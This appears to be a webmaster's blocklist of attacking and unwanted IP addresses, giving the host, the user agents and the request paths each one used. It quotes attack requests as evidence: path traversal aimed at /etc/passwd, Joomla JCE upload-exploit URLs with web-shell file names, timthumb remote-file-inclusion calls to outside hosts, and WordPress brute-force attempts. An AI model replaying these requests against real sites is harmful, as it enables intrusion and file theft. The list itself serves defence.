27.47.7.166 Host: China – Guangzhou China Unicom Guangdong Province Network Looking for non-existent .zip and .rar files
68.82.252.144 Hostname: c-68-82-252-144.hsd1.pa.comcast.net
Host: United States – Ivyland Comcast Cable Communications Inc.
Web server: 2 websites – cybercaffeinate.com , thicketgate.com
URLChecker bot
User agent: URLChecker
210.5.47.203 Hostname: ns74.small-dns.com
Host: Malaysia – Kuala Lumpur Ipserverone – Web & Email Hosting
Web server: 627 websites
Hacker looking for multiple exploits including below and others
1) 724CMS SQL injection exploit
/section.php?Module_Text=CoBRa_21&ID=6&Lang=En&Nav=Section&Module=../../../../../../../../../../etc/passwd%00
2)Factux SQL injection Exploit
/Factux/bon_suite.php?lang=../../../../../etc/passwd%00
217.170.166.107 Hostname: host-217-170-166-107.biz.net-inotel.pl
Host: Poland – Kozieglowy Inotel S.a.
Web server: 1 website – kozieglowy.com.pl
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
107.20.8.42 Hostname: ec2-107-20-8-42.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
FAKE USER AGENT.
This bot uses your domain name as a user agent.
Referrer is http: //netcomber.com
Another bad bot hosted by Amazon (AWS)
68.233.247.157 Hostname: 68-233-247-157.static.hvvc.us
Host: United States – Tampa Noc4hosts Inc.
Scraper bot
User agent: Nutch12/Nutch-1.2
14.139.236.213 Hostname: website.iiita.ac.in
Host: India – Allahabad Indian Institute Of Information Technology Allahabad
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples: 1) //images/stories/ViAr.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
3) //images/stories/food/footer.php?clone
46.105.28.232 Hostname: vps18807.ovh.net
Host: France – Roubaix Ovh Systems
Web server: 44 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples: 1) /images/stories/config.inc.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
210.253.110.34 Hostname: xcaret.co.jp
Host: Japan – Tokyo Gmo Internet Inc
Web server: 1 website – xcaret.co.jp
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28
Examples: 1) //images/stories/3xp.php
94.76.213.67 Hostname: bluefish2.dediboxes.co.uk
Host: United Kingdom – Maidenhead Simply Transit Ltd
Web server: 117 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
195.88.203.179 Host: Netherlands – Rotterdam W3media B.v.
Web server: 7 websites
WordPress dictionary attack
91.250.97.205 Hostname: www. myinternetservice.de
Host: Germany – Koeln Host Europe Gmbh
Web server: 19 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples: 1) /images/stories/barner.gif
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
87.238.192.95 Hostname: sh2095.evanzo-server.de
Host: Germany – Berlin Evanzo E-commerce Gmbh Infrastructure
Web server: 1597 websites
Hacker Looking for Joomla JCE exploit:
Known hacker bot user agents:
1) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples: 1) URL&sa=U&ei=thXMUtqfOejl4QTnx4GQCw&ved=0CI4BEBYwFg&usg=AFQjCNEgY1VYU-EAVNA1SzZ9TtZU2o_PVA//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
54.205.42.236 Hostname: ec2-54-205-42-236.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
SPY BOT WARNING: FAKE USER AGENT.
This bot uses your domain name as a user agent.
Referrer is http: //netcomber.com
Another bad bot hosted by Amazon (AWS)
173.233.80.162 Hostname: 173-233-80-162.STATIC.turnkeyinternet.net
Host: United States – Latham Turnkey Internet Inc
Web server: 38 websites
Hacker: Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
Looking for Joomla JCE exploit
Examples: 1) /images/stories/vito.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
207.106.190.66 Hostname: gw2.zoominfo.com
Host: United States – Andover Zoominfo – Data Center
NextGenSearchBot
Zoominfo scraper
67.23.224.89 Hostname: server.businessproweb.com
Host: United States – Orlando Hostdime.com Inc.
Web server: 666 websites
Dictionary attacker
Trying to login to WordPress with username “admin”
66.135.60.214 Host: United States – San Antonio Serverbeach
Web server: 207 websites
Dictionary attacker
Trying to login to WordPress with username “admin”
91.215.216.42 Hostname: everest.icnhost.net
Host: Bulgaria – Plovdiv Internet Corporated Networks Ltd.
Web server: 207 websites
DoS type RFI attack from this IP looking for known Bigace exploit./system/admin/include/upload_form.php?GLOBALS=(malicious script)
194.109.22.86 Hostname: whl-www6.xs4all.net
Host: Netherlands – Amsterdam Xs4all Servers
Hacker: Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE exploit
Examples: 1) //images/stories/dor/dor.php?clone
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
176.9.155.226 Hostname: 176-9-155-226.crawler.sistrix.net
Host: Germany – Nuremberg Hetzner Online Ag
SISTRIX Crawler:
UA: Mozilla/5.0 (compatible; SISTRIX Crawler; http: //crawler.sistrix.net/)
188.40.12.61 Hostname: server3.myadeska.de
Host: Germany – Nuremberg Hetzner Online Ag
Web server: 364 websites
Hacker: Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
Looking for Joomla JCE exploit
Examples: 1) /images/stories/nob0dy.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
190.199.94.38 Hostname: 190-199-94-38.dyn.dsl.cantv.net
Host: Venezuela – Caracas Cantv Servicios Venezuela
Comment spammer
80.190.174.200 Host: Germany – Nuremberg Webagentur Speed-server.de Hacker: Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE exploit
Examples: 1) //images/stories/wawalo.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2.228.105.131 Hostname: 2-228-105-131.ip191.fastwebnet.it
Host: Italy – Chieti Sinet
Web server: 22 websites
Hacker: Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/Aggregate/timthumb.php?src=http: //flickr.com.tr.realityinformatica.com%2Fbad.php
216.229.64.92 Hostname: hoteltravelmovie.de
Host: Germany – Berlin Strato Ag
Hacker: Known hacker bot user agents:
1) Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.2.13) Gecko/20110103 Fedora/3.6.13-1.fc14 Firefox/3.6.13
Looking for Joomla JCE exploit
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
88.208.96.152 Host: Czech Republic – Prague Otidea A.s.
Web server: 17 websites
Hacker: Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
Looking for Joomla JCE exploit
1) //index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20& etc
85.214.139.113 Hostname: hoteltravelmovie.de
Host: Germany – Berlin Strato Ag
Web server: 18 websites
Hacker: Looking for Joomla JCE exploit
Examples: 1) /images/stories/3xp.php
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
User agent: Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; Windows NT 5.1; (R1 1.5); .NET CLR 2.0.50727; InfoPath.1)
212.85.153.14 Hostname: emile.lost-oasis.net
Host: France – Marseille Neuronnexion
Hacker: Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.2.13) Gecko/20110103 Fedora/3.6.13-1.fc14 Firefox/3.6.13
Looking for Joomla JCE exploit
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
176.9.139.112 Hostname: 176-9-139-112.crawler.sistrix.net
Host: Germany – Nuremberg Hetzner Online Ag
SISTRIX bot:
Mozilla/5.0 (compatible; SISTRIX Crawler; http: //crawler.sistrix.net/)
80.246.53.13 Host: Germany – Grub Am Forst Webspace Verkauf.de
Web server: 549 websites
Hacker: Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE exploit
Examples: 1) /images/stories/barner.gif
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
155.207.200.89 Hostname: bf6.csd.auth.gr
Host: Greece – Thessaloniki Aristotle University Of Thessaloniki
Bad user agent: python-requests/0.12.1
205.134.253.13 Hostname: elite633.inmotionhosting.com
Host: United States – San Francisco Inmotion Hosting
Hacker: Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE exploit
Examples: 1) //images/stories/localhost.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
199.116.78.83 Hostname: lamp17-out.cloudaccess.net
Host: United States – Warren Cloudaccess.net Llc
Hacker: Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE exploit
Examples: 1) /images/stories/edan.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
5.9.219.166 Hostname: hosted-by.reliablesite.net
Host: Germany – Gunzenhausen 01cloud
Hacker: Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE exploit
Examples: 1) /images/stories/xnight.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
64.237.45.114 Hostname: hosted-by.reliablesite.net
Host: United States – Greenwich Reliablesite.net Llc
(Choopa, LLC)
Scraper bot: RSSingBot (http: //www.rssing.com)
159.148.74.62 Hostname: ews47.everyware.ch
Host: Latvia – Riga I-net Sia
Web server: 2 websites – cxo.lv , marinestandard.lv
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE exploit
Examples: 1) /images/stories/config.inc.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
49.156.148.228 Host: India – Kakinada Using In Hyd Noc Some sort of rogue bot
Identifies itself as a brower user agent Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 then behaves like a bot.
Crawled scripts and images, read robots.txt and looked for humans.txt
194.150.113.89 Host: Denmark – Randers Dandomain Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE exploit
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
202.191.56.207 Host: Viet Nam – Ha Noi Hanoi Universsity Of Technology
Web server: 1 website – spr-project.org
Looking for Joomla JCE exploit
//images/stories/3xp.php
123.30.175.100 Hostname: static.vdc.vn
Host: Viet Nam – Ha Noi Vietnam Data Communication Company
coccoc bot
User Agent: Mozilla/5.0 (compatible; coccoc/1.0; +http: //help.coccoc.com/)
192.241.132.27 Host: United States – New York City Digital Ocean Inc.
Web server: 1 website – musaper.com
Malicious bot: Wget/1.13.4 (linux-gnu)
212.85.153.14 Hostname: emile.lost-oasis.net
Host: France – Marseille Neuronnexion
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
Looking for Joomla JCE exploit
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
212.71.111.47 Hostname: ews47.everyware.ch
Host: Switzerland – Wil Everyware Ag
Web server: 144 websites
Attack on wp-admin
208.113.186.109 Hostname: habersham.dreamhost.com
Host: United States – San Francisco New Dream Network Llc
Attack on wp-admin
Probably a web server IP (Dreamhost)
98.130.0.212 Host: United States – Columbus Ecommerce Corporation Attack on wp-admin
81.215.38.71 Hostname: p3nw8shg322.shr.prod.phx3.secureserver.net
Host: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Attack on wp-admin
208.89.208.127 Host: United States – Kansas City Dnsslave.com
VIRPUS – DNSSLAVE.COM
Multiple attempts to join/register using common signup URLs for various CMS
Bad host – VIRPUS
50.115.172.246 Host: United States – Kansas City Dnsslave.com
VIRPUS – DNSSLAVE.COM
Multiple attempts to join/register using common signup URLs for various CMS
Bad host – VIRPUS
184.168.46.68 Hostname: p3nw8shg322.shr.prod.phx3.secureserver.net
Host: United States – Scottsdale Godaddy.com Llc
Web server: 2961 websites
Hotlinker – imagelucidity.com
198.20.89.250 Hostname: server.maximagroup.net
Host: United States – Chicago Singlehop Inc.
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
Looking for Joomla JCE exploit
Examples: 1) //images/stories/tmp.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
75.126.41.92 Hostname: 75.126.41.92-static.reverse.softlayer.com
Host: United States – Dallas Softlayer Technologies Inc.
Unwanted bot: spotinfluence
User agent: spotinfluence/Nutch-1.4 (Spot Influence crawler; http: //spotinfluence.com; hello at spotinfluence dot com)
95.85.1.108 Host: Russian Federation – Moscow Llc Sirius
Digital Ocean, Inc
Digital Ocean “SEO” spy bot user agent: updown_tester
92.61.36.95 Hostname: ltvnsplsk4.hostex.lt
Host: Lithuania – Vilnius Uab Hostex
Web server: 513 websites
Webserver
No user agent included in request header
No referrer
207.241.226.94 Hostname: wwwb-redis0.us.archive.org
Host: United States – Houston Internet Archive
User Agent: Jakarta Commons-HttpClient/3.1
Archive.org bots nothing but a nuisance. will try to load ancient scripts and syleshhets
185.14.187.79 Host: Netherlands – Amsterdam Digital Ocean Inc. Digital Ocean “SEO” spy bot user agent: updown_tester
141.0.170.143 Host: Netherlands – Amsterdam Serverstack Digital Ocean “SEO” spy bot user agent: updown_tester
192.81.222.248 Host: Netherlands – Amsterdam Digital Ocean Inc. Digital Ocean “SEO” spy bot user agent: updown_tester
198.199.81.54 Host: United States – New York City Digital Ocean Inc. Digital Ocean “SEO” spy bot user agent: updown_tester
91.150.173.2 Host: Poland – Rzeszow Netres S.c.
Web server: 2 websites – soknet.pl , wave-net.pl
Attack on wp-login with username admin
114.129.33.79 Hostname: accobrandsasia.com
Host: Singapore – Iconz-webvisions Pte. Ltd.
Web server: 6 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
84.47.186.27 Host: Russian Federation – Moscow Llc Nauka-svyaz
Web server: 34 websites
Hacker looking for various ajax exploits
Examples:
1) /fckeditor/editor/plugins/ajaxfilemanager/ajax_create_folder.php
2) /includes/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php
3)/photo/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/ajax_create_folder.php
93.174.125.94 Hostname: 125-94.eport.gr
Host: Greece – Athens Prokopiou A. Toulkaridis X. O.e.
Web server: 81 websites
Hacker:
Fake user agents:
1) Mozilla/5.0 (compatible;Baiduspider/2.0;+http: //www.baidu.com/search/spider.html)
Looking for Joomla JCE exploit
Examples: 1) //images/stories/zoneh.php
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
3) //images/stories/myblack.php
109.194.33.139 Hostname: 109x194x33x139.static-business.tomsk.ertelecom.ru
Host: Russian Federation – Tomsk Cjsc Er-telecom Holding
Hacker Botnet – Looking for wpOnlineStore / osCommerce / ZenCart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
94.10.120.159 Hostname: 5e0a789f.bb.sky.com
Host: United Kingdom – London Sky Broadband
Hacker Botnet – Looking for wpOnlineStore / osCommerce / ZenCart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
62.75.253.189 Hostname: euve2351.vserver.de
Host: Germany – Hurth Intergenia Ag
Web server: 3 websites
Hacker Botnet – Looking for wpOnlineStore / osCommerce / ZenCart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
79.174.66.14 Hostname: 2493.ovz37.hc.ru
Host: Russian Federation – Moscow Hosting Center Ltd.
Web server: 1 website – zoogoods.ru
Hacker Botnet – Looking for wpOnlineStore / osCommerce / ZenCart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
96.31.70.5 Hostname: lists.hgtms.com
Host: United States – Tampa Noc4hosts Inc.
Hacker Botnet – Looking for wpOnlineStore / osCommerce / ZenCart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
189.254.253.18 Hostname: lac.moz.com.mx
Host: Mexico – Zihuatanejo Uninet S.a. De C.v.
Hacker Botnet – Looking for wpOnlineStore / osCommerce / ZenCart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
50.30.43.228 Hostname: usve1477.vserver.de
Host: United States – Saint Louis Hosting Solutions International Inc.
Hacker Botnet – Looking for wpOnlineStore / osCommerce / ZenCart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
37.191.217.97 Hostname: host-37-191-217-97.lynet.no
Host: Norway – Oslo Lynet Internett As
Hacker Botnet – Looking for wpOnlineStore / osCommerce / ZenCart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
189.108.102.134 Hostname: 189-108-102-134.customer.tdatabrasil.net.br
Host: Brazil – Catanduva Fundacao Padre Albino
Web server: 1 website – webfipa.com.br
Hacker Botnet – Looking for wpOnlineStore / osCommerce / ZenCart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
177.106.135.242 Hostname: 177-106-135-242.xd-dynamic.ctbcnetsuper.com.br
Host: Brazil – Uberlandia Companhia De Telecomunicacoes Do Brasil Central
Hacker Botnet – Looking for wpOnlineStore / osCommerce / ZenCart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
200.160.125.17 Hostname: 200-160-125-017.static.spo.ctbc.com.br
Host: Brazil – Sao Paulo Ctbc Multimidia Data Net S/a
Hacker Botnet – Looking for wpOnlineStore / osCommerce / ZenCart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
87.236.197.10 Hostname: hosting.grapharts.cz
Host: Czech Republic – Prague Coolhousing S.r.o.
Web server: 34 websites
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/romania.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
72.10.50.19 Hostname: eurmoma.it
Host: United States – New York City Media Temple Inc.
Web server: 1 website – eurmoma.it
Spammer – looking for xmlrpc.php
Example: URL/&sa=U&ei=fsW_Ur6SJsb0oAS4h4LoDg&ved=0CDwQFjAEOEY&usg=AFQjCNEiEmH7XZ9apMppiliRFW1Mu_RW3w/api/xmlrpc
46.20.43.10 Hostname: e241.enterprise.fastwebserver.de
Host: Germany – Dusseldorf Myloc Colocation/enterprise Line
Web server: 181 websites
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) //images/stories/racrew.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
37.1.216.48 Host: Germany – End 3nt Solutions Llp Hacker looking for WordPress and site admin exploits
99.192.42.26 Hostname: sydnns0109w-099192042026.dhcp-dynamic.FibreOp.ns.bellaliant.net
Host: Canada – Sydney Bell Aliant/dsl-hsi
Hacker looking for Joomla JCE Editor exploit
/images/stories/zoneh.php
5.9.156.238 Host: Germany – Nuremberg Hetzner Online Ag Hacker scanning for admin exploit
/administrator/index.php
82.229.70.206 Hostname: crj95-1-82-229-70-206.fbx.proxad.net
Host: France – Tours Proxad/free Sas
Spambot: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36 Squider/0.01
216.55.166.67 Hostname: server.gadgetsfactory.com
Host: United States – Lenexa Codero
Scanning for old WordPress Akismet plugin exploit vulnsrability
81.47.175.201 Hostname: 201.Red-81-47-175.staticIP.rima-tde.net
Host: Spain – Madrid Telefonica De Espana Sau
Web server: 9 websites
Hacker:
Known hacker bot user agent:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) //images/stories/3xp.php
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
182.73.254.222 Host: India – Hyderabad Cipher Cloud India Pvt Ltd Malicious user agent: Apache-HttpClient/4.0-beta2 (java 1.5)
216.55.143.51 Hostname: 216-55-143-51.dedicated.codero.net
Host: United States – Lenexa Codero
Web server: 9 websites
Malicious user agents:
1) Java/1.6.0_24
2) PHPCrawl
85.252.49.107 Hostname: linux7.fastname.no
Host: Norway – Tonsberg Customer Nets
Web server: 1586 websites
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/bouncer.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
175.126.111.48 Host: Korea, Republic Of – Seoul Hanaro Telecom Brute force dictionary attack on wp-login.php wirh username “admin”
213.238.167.49 Hostname: 49-167-238-213.ip.idealhosting.net.tr
Host: Turkey – Istanbul Ideal Hosting Tic. Ltd. Sti.
Brute force dictionary attack on wp-login.php wirh username “admin”
198.58.81.202 Hostname: crayon.mysitehosted.com
Host: United States – Santa Rosa Arvixe Llc
Web server: 1 website – hrltcp.org
Hacker:
Known hacker bot user agent:
1) BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2.139.176.44 Hostname: 44.Red-2-139-176.staticIP.rima-tde.net
Host: Spain – Madrid Telefonica De Espana Sau
Web server: 1 website – contactophoto.com
Hacker:
Known hacker bot user agent:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/vito.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
213.254.14.51 Host: Italy – Torino It.gate S.p.a.
Web server: 20 websites
Hacker:
Known hacker bot user agent:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) //images/stories/ViAr.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
85.214.69.173 Hostname: h1442544.stratoserver.net
Host: Germany – Berlin Strato Ag
Hacker:
Known hacker bot user agent:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) /articles/images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
188.215.55.220 Hostname: host.robertorossi.ro
Host: Romania – Bucharest Sc Clax Telecom Srl
Web server: 3 websites
Brute force attack on site admin
92.103.79.51 Hostname: reverse.completel.net
Host: France – Paris Montrouge
Suspicious bot with user agent mozilla opera
89.174.7.138 Hostname: ebita-89-174-7-138-static.vps-i.pl
Host: Poland – Warsaw Gts Poland Sp. Z O.o.
Web server: 80 websites
Hacker:
Known hacker bot user agent:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/config.inc.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
69.64.37.64 Hostname: eagle217.dedicatedpanel.com
Host: United States – Saint Louis Hosting Solutions International Inc.
Web server: 2 websites – purpalhazz.com , purpaltube.com
Hacker:
Known hacker bot user agent:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/config.inc.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
94.120.200.206 Host: Turkey – Emirgazi Dogan Tv Digital Platform Isletmeciligi A.s Dictionary attack on WordPress with user name “admin”
82.98.162.14 Host: Germany – Frankfurt Am Main 3nt Solutions Llp
Web server: 79 websites
Hacker: Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/plugins/wp-file-uploader/timthumb.php?src=http: //flickr.com.newwybarbie.com%2Fbad.php
82.98.162.14 Hostname: dl298.dinaserver.com
Host: Spain – Madrid Dinahosting S.l.
Web server: 1 website – itinere.coop
Hacker:
Known hacker bot user agent:
1) BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/borong.gif
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
117.120.1.146 Hostname: plsk.fivecube.net
Host: Singapore – Readyspace Infra And Dedicated Services
Web server: 4 websites
Hacker:
Known hacker bot user agent:
1) BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/borong.gif
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
91.227.16.13 Hostname: srv3.host-food.ru
Host: Russian Federation – Llc Eximius
Web server: 859 websites
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) //images/stories/explore.gif
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
5.152.212.186
Hostname: h5-152-212-186.host.redstation.co.uk
Host: United Kingdom – Gosport Redstation Limited
Web server: 37 websites
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
